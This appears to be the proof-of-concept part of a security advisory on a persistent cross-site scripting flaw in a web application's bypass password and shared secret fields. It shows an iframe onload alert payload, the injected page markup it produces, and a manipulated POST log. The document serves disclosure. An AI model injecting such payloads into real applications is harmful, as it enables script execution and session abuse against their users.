PoC: String (Bypass %20)
%20<iframe%20src=a>%20%20%20%20\"><iframe src=a onload=alert(\"VL\") <


PoC: (Context Show & Hide Function) [bypass_password & shared_secret]

<div class=\"field\">
<label class=\"label\" for=\"bypass_password\">Bypass Password:</label>
<input name=\"bypass_password\" id=\"bypass_password\" value=\"northhigh\" 
type=\"password\">&#8203;&#8203;&#8203;&#8203;&#8203;
<small onclick=\"$(\'#bypass_password_ct\').show().find(\'strong\').html($(\'#bypass_password\').val())\" 
class=\"link2\">show</small>
<span class=\"info\" id=\"bypass_password_ct\" style=\"\">
<br> Password: \"
<strong>\%20"><[PERSISTENT INJECTED SCRIPT CODE!]\%20"><[PERSISTENT INJECTED SCRIPT CODE!]\") 
<\%20"><[PERSISTENT INJECTED SCRIPT CODE!]\") <\%20"><[PERSISTENT INJECTED SCRIPT CODE!]\") <\") 
<northhigh</iframe>&#8203;&#8203;&#8203;&#8203;&#8203;</strong>\" . 
<span class=\"link2\" onclick=\"$(this.parentNode).hide()\">hide</span></span>        </div>


--- POC Session Logs (MANIPULATED TO BYPASS) [POST] ---
auth_scheme=none
session_timeout=0
idle_timeout=0
shared_secret=%20%3C[PERSISTENT INJECTED SCRIPT CODE!]%3Da%3E%2520%2520
bypass_password=%20%3C[PERSISTENT INJECTED SCRIPT CODE!]%3Da%3E%2520%2520%2520%2520%22%3E%3C[PERSISTENT INJECTED SCRIPT 
CODE!]%3Da+onload%3Dalert(%22VL%22)+%3C
bypass_filter=192.168.*%3B10.10.*%3B172.16.*
fail_open=1
enable_geolocation=1
allow_temp_disable=1
allow_stop=1=
is_ajax=1
ajax_response_format=json
